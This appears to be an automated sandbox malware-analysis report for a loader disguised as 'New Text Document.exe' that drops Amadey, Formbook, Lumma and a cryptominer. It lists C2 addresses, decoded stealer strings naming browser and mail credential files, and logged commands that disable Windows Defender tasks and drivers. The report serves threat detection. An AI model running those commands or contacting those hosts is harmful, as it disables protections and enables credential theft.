File name:

New Text Document.exe

Full analysis: https://app.any.run/tasks/2645021a-0548-44c4-bcb4-1be7a982c4c6
Verdict: Malicious activity
Threats:

Amadey is a formidable Windows infostealer threat, characterized by its persistence mechanisms, modular design, and ability to execute various malicious tasks.

Analysis date: November 09, 2024, 18:22:38
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
loader
amadey
botnet
stealer
formbook
hausbomber
dcrat
lumma
exfiltration
opendir
github
xloader
purplefox
backdoor
rdp
remote
screenconnect
ngrok
systembc
proxy
silentcryptominer
miner
themida
golang
nitol
ip-check
upx
xmrig
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows, 3 sections
MD5:

A239A27C2169AF388D4F5BE6B52F272C

SHA1:

0FEB9A0CD8C25F01D071E9B2CFC2AE7BD430318C

SHA256:

98E895F711226A32BFAB152E224279D859799243845C46E550C2D32153C619FC

SSDEEP:

48:YqYHO2f7Frk70zDJZZJOfTHH/rPmckulbfSqXSfbNtm:27Jlm/6ypf6zNt

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Connects to the CnC server

      • Gxtuum.exe (PID: 6720)
      • New Text Document.exe (PID: 6164)
    • AMADEY has been detected (SURICATA)

      • Gxtuum.exe (PID: 6720)
    • HAUSBOMBER has been detected (YARA)

      • New Text Document.exe (PID: 6164)
    • DCRAT has been detected (YARA)

      • New Text Document.exe (PID: 6164)
    • Stealers network behavior

      • crypted.exe (PID: 7164)
      • New Text Document.exe (PID: 6164)
    • FORMBOOK has been detected (SURICATA)

      • New Text Document.exe (PID: 6164)
    • FORMBOOK has been detected (YARA)

      • netbtugc.exe (PID: 5036)
    • AMADEY has been detected (YARA)

      • Gxtuum.exe (PID: 6720)
    • LUMMA has been detected (SURICATA)

      • crypted.exe (PID: 7164)
    • Adds extension to the Windows Defender exclusion list

      • chrone.exe (PID: 4232)
      • rfopgxavqojn.exe (PID: 5596)
    • NITOL has been detected (YARA)

      • main.exe (PID: 5276)
    • XMRIG has been detected (YARA)

      • notepad.exe (PID: 3964)
  • SUSPICIOUS

    • Starts itself from another location

      • AllNew.exe (PID: 300)
    • Executable content was dropped or overwritten

      • AllNew.exe (PID: 300)
      • New Text Document.exe (PID: 6164)
      • rundll32.exe (PID: 5980)
      • chrone.exe (PID: 4232)
      • rfopgxavqojn.exe (PID: 5596)
      • Gxtuum.exe (PID: 6720)
    • Process requests binary or script from the Internet

      • New Text Document.exe (PID: 6164)
      • Gxtuum.exe (PID: 6720)
    • Connects to the server without a host name

      • Gxtuum.exe (PID: 6720)
      • New Text Document.exe (PID: 6164)
    • Contacting a server suspected of hosting an CnC

      • Gxtuum.exe (PID: 6720)
      • New Text Document.exe (PID: 6164)
    • Potential Corporate Privacy Violation

      • New Text Document.exe (PID: 6164)
      • Gxtuum.exe (PID: 6720)
    • The process executes via Task Scheduler

      • Gxtuum.exe (PID: 6292)
      • Gxtuum.exe (PID: 6440)
      • Gxtuum.exe (PID: 7140)
      • Gxtuum.exe (PID: 3676)
      • Gxtuum.exe (PID: 864)
      • Gxtuum.exe (PID: 4312)
      • Gxtuum.exe (PID: 6304)
      • Gxtuum.exe (PID: 2056)
      • Gxtuum.exe (PID: 4208)
      • Gxtuum.exe (PID: 4816)
    • There is functionality for enable RDP (YARA)

      • Gxtuum.exe (PID: 6720)
    • Starts process via Powershell

      • powershell.exe (PID: 6668)
    • Application launched itself

      • crypted.exe (PID: 1252)
    • Executes application which crashes

      • crypted.exe (PID: 1252)
      • MSBuild.exe (PID: 3924)
      • ev.exe (PID: 6316)
    • Starts POWERSHELL.EXE for commands execution

      • chrone.exe (PID: 6200)
      • chrone.exe (PID: 4232)
      • rfopgxavqojn.exe (PID: 5596)
    • Executes as Windows Service

      • VSSVC.exe (PID: 7012)
      • ScreenConnect.ClientService.exe (PID: 6688)
      • rfopgxavqojn.exe (PID: 5596)
    • Uses REG/REGEDIT.EXE to modify registry

      • cmd.exe (PID: 6564)
      • cmd.exe (PID: 1204)
      • cmd.exe (PID: 4144)
      • cmd.exe (PID: 864)
      • cmd.exe (PID: 6336)
      • cmd.exe (PID: 6420)
      • cmd.exe (PID: 5828)
      • cmd.exe (PID: 6456)
      • cmd.exe (PID: 6136)
      • cmd.exe (PID: 5196)
      • cmd.exe (PID: 6668)
      • cmd.exe (PID: 3772)
      • cmd.exe (PID: 1452)
      • cmd.exe (PID: 2280)
      • cmd.exe (PID: 6500)
      • cmd.exe (PID: 2380)
      • cmd.exe (PID: 6228)
      • cmd.exe (PID: 1428)
      • cmd.exe (PID: 4508)
      • cmd.exe (PID: 7032)
      • cmd.exe (PID: 864)
      • cmd.exe (PID: 4080)
      • cmd.exe (PID: 3972)
      • cmd.exe (PID: 5372)
      • cmd.exe (PID: 6992)
      • cmd.exe (PID: 6564)
      • cmd.exe (PID: 6768)
      • cmd.exe (PID: 6712)
      • cmd.exe (PID: 6796)
      • cmd.exe (PID: 6496)
      • cmd.exe (PID: 7164)
      • cmd.exe (PID: 7036)
      • cmd.exe (PID: 6852)
    • Starts CMD.EXE for commands execution

      • ev.exe (PID: 6316)
      • chrone.exe (PID: 4232)
      • rfopgxavqojn.exe (PID: 5596)
    • Found strings related to reading or modifying Windows Defender settings

      • ev.exe (PID: 6316)
    • Modifies existing scheduled task

      • schtasks.exe (PID: 4516)
      • schtasks.exe (PID: 3732)
      • schtasks.exe (PID: 512)
      • schtasks.exe (PID: 696)
      • schtasks.exe (PID: 7052)
    • Script adds exclusion extension to Windows Defender

      • chrone.exe (PID: 4232)
      • rfopgxavqojn.exe (PID: 5596)
    • Manipulates environment variables

      • powershell.exe (PID: 5940)
      • powershell.exe (PID: 6308)
    • Process uninstalls Windows update

      • wusa.exe (PID: 7060)
      • wusa.exe (PID: 3608)
    • Starts SC.EXE for service management

      • chrone.exe (PID: 4232)
      • rfopgxavqojn.exe (PID: 5596)
    • Uses powercfg.exe to modify the power settings

      • chrone.exe (PID: 4232)
      • rfopgxavqojn.exe (PID: 5596)
    • Script adds exclusion path to Windows Defender

      • chrone.exe (PID: 4232)
      • rfopgxavqojn.exe (PID: 5596)
    • Connects to unusual port

      • New Text Document.exe (PID: 6164)
    • Drops a system driver (possible attempt to evade defenses)

      • rfopgxavqojn.exe (PID: 5596)
    • NGROK has been detected

      • New Text Document.exe (PID: 6164)
    • There is functionality for taking screenshot (YARA)

      • hfs.exe (PID: 6280)
      • ScreenConnect.ClientService.exe (PID: 6688)
      • ScreenConnect.WindowsClient.exe (PID: 3928)
    • There is functionality for communication over UDP network (YARA)

      • hfs.exe (PID: 6280)
    • Start notepad (likely ransomware note)

      • rfopgxavqojn.exe (PID: 5596)
    • There is functionality for capture public ip (YARA)

      • hfs.exe (PID: 6280)
  • INFO

    • Reads the computer name

      • New Text Document.exe (PID: 6164)
    • Disables trace logs

      • New Text Document.exe (PID: 6164)
    • Reads the machine GUID from the registry

      • New Text Document.exe (PID: 6164)
    • Checks proxy server information

      • New Text Document.exe (PID: 6164)
    • Checks supported languages

      • New Text Document.exe (PID: 6164)
    • Reads Environment values

      • New Text Document.exe (PID: 6164)
    • Reads the software policy settings

      • New Text Document.exe (PID: 6164)
    • Executable content was dropped or overwritten

      • msiexec.exe (PID: 6556)
      • msiexec.exe (PID: 6960)
    • Themida protector has been detected

      • chrone.exe (PID: 4232)
      • MajesticExec.exe (PID: 6888)
    • Manages system restore points

      • SrTasks.exe (PID: 6184)
    • Application based on Golang

      • main.exe (PID: 5276)
    • UPX packer has been detected

      • notepad.exe (PID: 3964)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Formbook

(PID) Process(5036) netbtugc.exe
C2www.3xfootball.com/fo8o/
Strings (160)wZ22jDxn8hwtYnnk/w==
q7/IljAuWKUjP9LzhVY6WZAW9xV7Lg==
anq78FxRDdKIkSoWlEQ4UEY=
eoSThluq4iN+Rc41zntRhYHb6g==
O7h30riqRAahR9T5HRI7p/6UE1viZkY=
aRcJ4yR+JIlEsDUz7RliR0c=
P2kk3YkFysLZ/xr8j/NT
j7IAjFzbh8BedRjGafGC
90ZjYDDmDegov0HX93hL+BrlCg==
VsB/tN7GW0IFCVxBK3vSdgciaRw=
H2irRWi3sEVnQwpn
mhcjIf6APjHV6w==
HAYqkhKqQwlU/+84
jtQLwFdZ6cHaVA==
AcSWbce98Gsa3H82yeOI6PU=
P/hl4kjf5lO9sx8CPgVLtN0=
FyorLjEqBPkYxd/H21pCdCXeTRU=
2mA3Vksr7QqmQYRh
zN7V+QxiOiJucVyPV4tnoEEC8Q==
vOXO5TwZqh4J
aBo2kIefHxtRX9tg+blTqCBUoaSmUA==
ym9QCdS0FskyRQW1K8aS
QHqoCUeH3RU=
+UJdoYhH0dD7h9tu
Gc2LVVpZN7Z5TpULwg8=
4civn4lQpEI=
joSQgk4Zulvmr5FllmCK
OBlNjAjPL0wWVzbYOvk5KRX20vA=
GHL66NFKaYDm0cPfSOTb
jgQX31OVhboCZNs=
iHkmyaL+z9Qv6pxULDjbdg==
uQwC+RvpT7YO1adGimLC
pMIXi/72muqkB92h5rtgXF8K1wWh
LPlp6EDzMKb54YJ+PsJG
74LKKYDwOswIEZH8
32HxZtOweLPzgYOtapw=
jbsLo3quFldiNGxZd/pl4Q==
MBujXUAtHYKkJhltfDsCIA==
+9Zoakef2z7Z4HWZ3vQOWwgitgY=
E3ZGa1Mxh8TVks2o6Jq+2AcLwwY=
LpD8ktMaPtn+36mfdJE=
PA9jrCXW5/545XgBZQ==
9IdSnrZ6FejIUA==
zmTz3LjDiW9gHw==
RjQA3SM/LSY/Vm+AzFk9XRqEHgI=
cA2gKXAjjUvKHQ==
H1UWMp77XV0Vfzckjz5d6JEInA==
zMTMqYuyvylNTKeyWdAV5G8=
R8FUU7VPz5oOWA==
NqVC3s+EEmnc3ZB3qmGgisk=
hWkeFU0k8euvtAzROivfAFADzQ==
ZLMTNMbPaM6Mll+gaI5SqsEl
/5M+8u4pdcT0o1M=
klXyGLgc/igvqqUE/agIQcuKH6nW
sbpIMePNoeasuAlnNmE=
w9h15yT/GUabbUYOxle5kro+olk=
5jPmD22F+yGZXaG4STUWJ/LEr+xF
32UZpKuV1T7ISCfS
XBqwal9KQYlJn30jirmREQzvp+02
d6noklWTPPb0jA==
J59j4FW+S9Dq9KOQuLAY2wE9nq61
+vj5urFvIEJOnr4mZNdu
tHYXzDTgsf6ddg==
xpRPfdi+yRdY/2c=
XGuo+LeH4w966ZOpW5DbeGUIbw425TnS+g==
netbtugc.exe
verclsid.exe
chkdsk.exe
mshta.exe
sdiagnhost.exe
taskkill.exe
msdt.exe
winver.exe
rundll32.exe
ReAgentc.exe
Utilman.exe
msiexec.exe
kernel32.dll
advapi32.dll
ws2_32.dll
USERNAME
LOCALAPPDATA
USERPROFILE
APPDATA
TEMP
COMPUTERNAME
ProgramFiles
/c copy "
\Run
\Policies
\Explorer
\Registry\User
\Registry\Machine
\SOFTWARE\Microsoft\Windows\CurrentVersion
Office\15.0\Outlook\Profiles\Outlook\
\SOFTWARE\Mozilla\Mozilla
\Mozilla
Username:
Password:
formSubmitURL
usernameField
encryptedUsername
encryptedPassword
\logins.json
\Mail\
\Foxmail
\Storage\
\Accounts\Account.rec0
\Data\AccCfg\Accounts.tdat
\Google\Chrome\User Data\Default\Login Data
SeShutdownPrivilege
\BaseNamedObjects
POST
HTTP/1.1
Host:
Connection: close
Content-Length:
Cache-Control:
Origin: http://
Content-Type: application/x-www-form-urlencoded
Accept:
Referer: http://
Accept-Language:
Accept-Encoding:
Set-ExecutionPolicy RemoteSigned -Scope CurrentUser
-noexit "& ""
PowerShell.exe
\Opera Software\Opera Stable
kernel32.dll
user32.dll
wininet.dll
rg.ini
Recovery
profiles.ini
guid
Connection: close
pass
token
email
login
signin
account
persistent
GET
GET
PUT
POST
OPTIONS
User-Agent:
API-
MS-W
_301 Moved
_302 Found
InternetOpenA
InternetConnectA
HttpOpenRequestA
HttpSendRequestA
InternetReadFile
InternetCloseHandle

Amadey

(PID) Process(6720) Gxtuum.exe
C2185.215.113.36
URLhttp://185.215.113.36/Dem7kTu/index.php
Version5.04
Options
Drop directory23a0892ef8
Drop nameGxtuum.exe
Strings (125)e2
2016
/Plugins/
msi
vs:
-executionpolicy remotesigned -File "
0123456789
AVAST Software
Panda Security
\0000
cmd /C RMDIR /s/q
%USERPROFILE%
SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
lv:
wb
bi:
abcdefghijklmnopqrstuvwxyz0123456789-_
0000043f
Sophos
ComputerName
Startup
360TotalSecurity
2019
&unit=
zip
sd:
------
2022
r=
185.215.113.36
=
http://
2025
" && timeout 1 && del
&&
VideoID
WinDefender
d1
:::
SYSTEM\ControlSet001\Services\BasicDisplay\Video
kernel32.dll
" && ren
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
00000422
POST
00000423
%-lu
cred.dll
GET
st=s
Gxtuum.exe
dll
cmd
Avira
rb
DefaultSettings.XResolution
exe
Comodo
23a0892ef8
"taskkill /f /im "
ps1
un:
Bitdefender
ar:
Programs
ESET
-unicode-
00000419
<d>
Main
e1
pc:
AVG
SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
\App
/Dem7kTu/index.php
og:
#
.jpg
?scr=1
DefaultSettings.YResolution
dm:
Doctor Web
https://
/k
shell32.dll
Norton
GetNativeSystemInfo
SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
av:
shutdown -s -t 0
------
clip.dll
ProductName
os:
&& Exit"
rundll32
cred.dll|clip.dll|
-%lu
Content-Disposition: form-data; name="data"; filename="
\
|
/quiet
Content-Type: multipart/form-data; boundary=----
Rem
<c>
SOFTWARE\Microsoft\Windows NT\CurrentVersion
--
+++
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Content-Type: application/x-www-form-urlencoded
CurrentBuild
"
5.04
Kaspersky Lab
" Content-Type: application/octet-stream
Keyboard Layout\Preload
id:
e3
rundll32.exe
Powershell.exe
random
S-%lu-
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
ProgramData\
No Malware configuration.

TRiD

.exe | Generic CIL Executable (.NET, Mono, etc.) (82.9)
.dll | Win32 Dynamic Link Library (generic) (7.4)
.exe | Win32 Executable (generic) (5.1)
.exe | Generic Win/DOS Executable (2.2)
.exe | DOS Executable Generic (2.2)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2023:09:30 16:32:57+00:00
ImageFileCharacteristics: Executable, 32-bit
PEType: PE32
LinkerVersion: 11
CodeSize: 2048
InitializedDataSize: 2048
UninitializedDataSize: -
EntryPoint: 0x268e
OSVersion: 4
ImageVersion: -
SubsystemVersion: 4
Subsystem: Windows command line
FileVersionNumber: 0.0.0.0
ProductVersionNumber: 0.0.0.0
FileFlagsMask: 0x003f
FileFlags: (none)
FileOS: Win32
ObjectFileType: Executable application
FileSubtype: -
LanguageCode: Neutral
CharacterSet: Unicode
FileDescription:
FileVersion: 0.0.0.0
InternalName: New Text Document.exe
LegalCopyright:
OriginalFileName: New Text Document.exe
ProductVersion: 0.0.0.0
AssemblyVersion: 0.0.0.0
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
365
Monitored processes
230
Malicious processes
12
Suspicious processes
1

Behavior graph

Click at the process to see the details
start #FORMBOOK new text document.exe conhost.exe no specs bin.exe no specs allnew.exe #FORMBOOK netbtugc.exe no specs #AMADEY gxtuum.exe firefox.exe no specs gxtuum.exe no specs crypted.exe conhost.exe no specs #LUMMA crypted.exe werfault.exe chrone.exe no specs powershell.exe no specs conhost.exe no specs THREAT chrone.exe 248364651.exe no specs 248364651.exe ev.exe no specs ev.exe msiexec.exe msiexec.exe nvidia.exe no specs msiexec.exe no specs rundll32.exe vssvc.exe no specs msbuild.exe werfault.exe cmd.exe no specs cmd.exe no specs conhost.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs reg.exe no specs cmd.exe no specs reg.exe no specs conhost.exe no specs reg.exe no specs cmd.exe no specs reg.exe no specs conhost.exe no specs reg.exe no specs reg.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs reg.exe no specs cmd.exe no specs reg.exe no specs cmd.exe no specs reg.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs conhost.exe no specs cmd.exe no specs reg.exe no specs conhost.exe no specs cmd.exe no specs reg.exe no specs conhost.exe no specs reg.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs reg.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs reg.exe no specs cmd.exe no specs reg.exe no specs conhost.exe no specs reg.exe no specs reg.exe no specs cmd.exe no specs reg.exe no specs reg.exe no specs conhost.exe no specs reg.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs reg.exe no specs reg.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs schtasks.exe no specs schtasks.exe no specs cmd.exe no specs schtasks.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs schtasks.exe no specs conhost.exe no specs schtasks.exe no specs cmd.exe no specs reg.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs reg.exe no specs cmd.exe no specs conhost.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs reg.exe no specs conhost.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs cmd.exe no specs reg.exe no specs conhost.exe no specs cmd.exe no specs reg.exe no specs cmd.exe no specs conhost.exe no specs conhost.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs werfault.exe THREAT majesticexec.exe no specs THREAT hfs.exe no specs powershell.exe no specs conhost.exe no specs https.exe no specs consoleapp2.exe no specs conhost.exe no specs THREAT main.exe no specs cmd.exe no specs conhost.exe no specs sc.exe no specs conhost.exe no specs sc.exe no specs conhost.exe no specs wusa.exe no specs sc.exe no specs conhost.exe no specs sc.exe no specs conhost.exe no specs sc.exe no specs conhost.exe no specs powercfg.exe no specs powercfg.exe no specs conhost.exe no specs powercfg.exe no specs conhost.exe no specs powercfg.exe no specs sc.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs sc.exe no specs conhost.exe no specs sc.exe no specs sc.exe no specs conhost.exe no specs conhost.exe no specs rfopgxavqojn.exe powershell.exe no specs conhost.exe no specs srtasks.exe no specs conhost.exe no specs msiexec.exe no specs msiexec.exe no specs THREAT screenconnect.clientservice.exe no specs THREAT screenconnect.windowsclient.exe no specs screenconnect.windowsclient.exe no specs ngrok.exe no specs cmd.exe no specs sc.exe no specs conhost.exe no specs conhost.exe no specs wusa.exe no specs sc.exe no specs conhost.exe no specs sc.exe no specs conhost.exe no specs sc.exe no specs conhost.exe no specs sc.exe no specs conhost.exe no specs conhost.exe no specs powercfg.exe no specs powercfg.exe no specs powercfg.exe no specs powercfg.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs THREAT notepad.exe no specs vmmanagedsetup.exe no specs stail.exe no specs gxtuum.exe no specs gxtuum.exe no specs gxtuum.exe no specs gxtuum.exe no specs ucpdmgr.exe no specs conhost.exe no specs ucpdmgr.exe no specs conhost.exe no specs gxtuum.exe no specs gxtuum.exe no specs gxtuum.exe no specs gxtuum.exe no specs gxtuum.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
204\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
204C:\Windows\syswow64\MsiExec.exe -Embedding F050F90C23043EB2A68AF137C81375BF E Global\MSI0000C:\Windows\SysWOW64\msiexec.exemsiexec.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows® installer
Exit code:
0
Version:
5.0.19041.3636 (WinBuild.160101.0800)
300"C:\Users\admin\Desktop\a\AllNew.exe" C:\Users\admin\Desktop\a\AllNew.exe
New Text Document.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Modules
Images
c:\users\admin\desktop\a\allnew.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\user32.dll
512schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /DisableC:\Windows\SysWOW64\schtasks.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Task Scheduler Configuration Tool
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
512reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /fC:\Windows\SysWOW64\reg.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Registry Console Tool
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\reg.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
528C:\WINDOWS\system32\powercfg.exe /x -standby-timeout-ac 0C:\Windows\System32\powercfg.exechrone.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Power Settings Command-Line Tool
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
696schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /DisableC:\Windows\SysWOW64\schtasks.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Task Scheduler Configuration Tool
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
696reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /fC:\Windows\SysWOW64\reg.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Registry Console Tool
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\reg.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
696\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowercfg.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
864"C:\Windows\System32\cmd.exe" /c reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance" /v "Enabled" /t REG_DWORD /d "0" /fC:\Windows\SysWOW64\cmd.exeev.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
Total events
40 814
Read events
40 687
Write events
108
Delete events
19

Modification events

(PID) Process:(6164) New Text Document.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\New Text Document_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(6164) New Text Document.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\New Text Document_RASAPI32
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(6164) New Text Document.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\New Text Document_RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(6164) New Text Document.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\New Text Document_RASAPI32
Operation:writeName:FileTracingMask
Value:
(PID) Process:(6164) New Text Document.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\New Text Document_RASAPI32
Operation:writeName:ConsoleTracingMask
Value:
(PID) Process:(6164) New Text Document.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\New Text Document_RASAPI32
Operation:writeName:MaxFileSize
Value:
1048576
(PID) Process:(6164) New Text Document.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\New Text Document_RASAPI32
Operation:writeName:FileDirectory
Value:
%windir%\tracing
(PID) Process:(6164) New Text Document.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\New Text Document_RASMANCS
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(6164) New Text Document.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\New Text Document_RASMANCS
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(6164) New Text Document.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\New Text Document_RASMANCS
Operation:writeName:EnableConsoleTracing
Value:
0
Executable files
39
Suspicious files
33
Text files
26
Unknown types
0

Dropped files

PID
Process
Filename
Type
6336WerFault.exeC:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_crypted.exe_e982833875b11cbedb9ef6ad11737afdff46ed_3bef0f2b_9d0cf63c-4dde-4601-b799-7a0aaf0d8017\Report.wer
MD5:
SHA256:
6128248364651.exeC:\Users\admin\AppData\Local\Temp\ScreenConnect\c13606fe9009f11d\setup.msi
MD5:
SHA256:
300AllNew.exeC:\Users\admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exeexecutable
MD5:C07E06E76DE584BCDDD59073A4161DBB
SHA256:CF67A50598EE170E0D8596F4E22F79CF70E1283B013C3E33E36094E1905BA8D9
6164New Text Document.exeC:\Users\admin\Desktop\a\bin.exeexecutable
MD5:1DCCE19E1A6306424D073487AF821FF0
SHA256:77E14CAAE3DAF05C1F5A6A3D10E4936CC58944D6AE9EC6943B1BE6D995E94B5C
6164New Text Document.exeC:\Users\admin\Desktop\a\AllNew.exeexecutable
MD5:C07E06E76DE584BCDDD59073A4161DBB
SHA256:CF67A50598EE170E0D8596F4E22F79CF70E1283B013C3E33E36094E1905BA8D9
6336WerFault.exeC:\ProgramData\Microsoft\Windows\WER\Temp\WERFEA8.tmp.WERInternalMetadata.xmlxml
MD5:CADFDD0B20683DB2DD89689C8FD0D1F7
SHA256:170F6BE4305A70F5EDB5BA49013340B0FCABE048845BD122E260A0F9A1EE00EA
6164New Text Document.exeC:\Users\admin\Desktop\a\248364651.exeexecutable
MD5:438EEFA86B9547C34689ED220758785A
SHA256:8A519A11426BA6D3269FEFE0FD37DEAB09F58D2D584CA010DD87128E2B51326F
6336WerFault.exeC:\Users\admin\AppData\Local\CrashDumps\crypted.exe.1252.dmpdmp
MD5:5A5D63B8A4C441BD4434E7F2402E7252
SHA256:2346C4FAC1A9CC864DCB8ED936EB4DC3996A32EE4106AE23A933C54815E04B7C
5980rundll32.exeC:\Users\admin\AppData\Local\Temp\MSI1A5D.tmp-\Microsoft.Deployment.WindowsInstaller.dllexecutable
MD5:5EF88919012E4A3D8A1E2955DC8C8D81
SHA256:3E54286E348EBD3D70EAED8174CCA500455C3E098CDD1FCCB167BC43D93DB29D
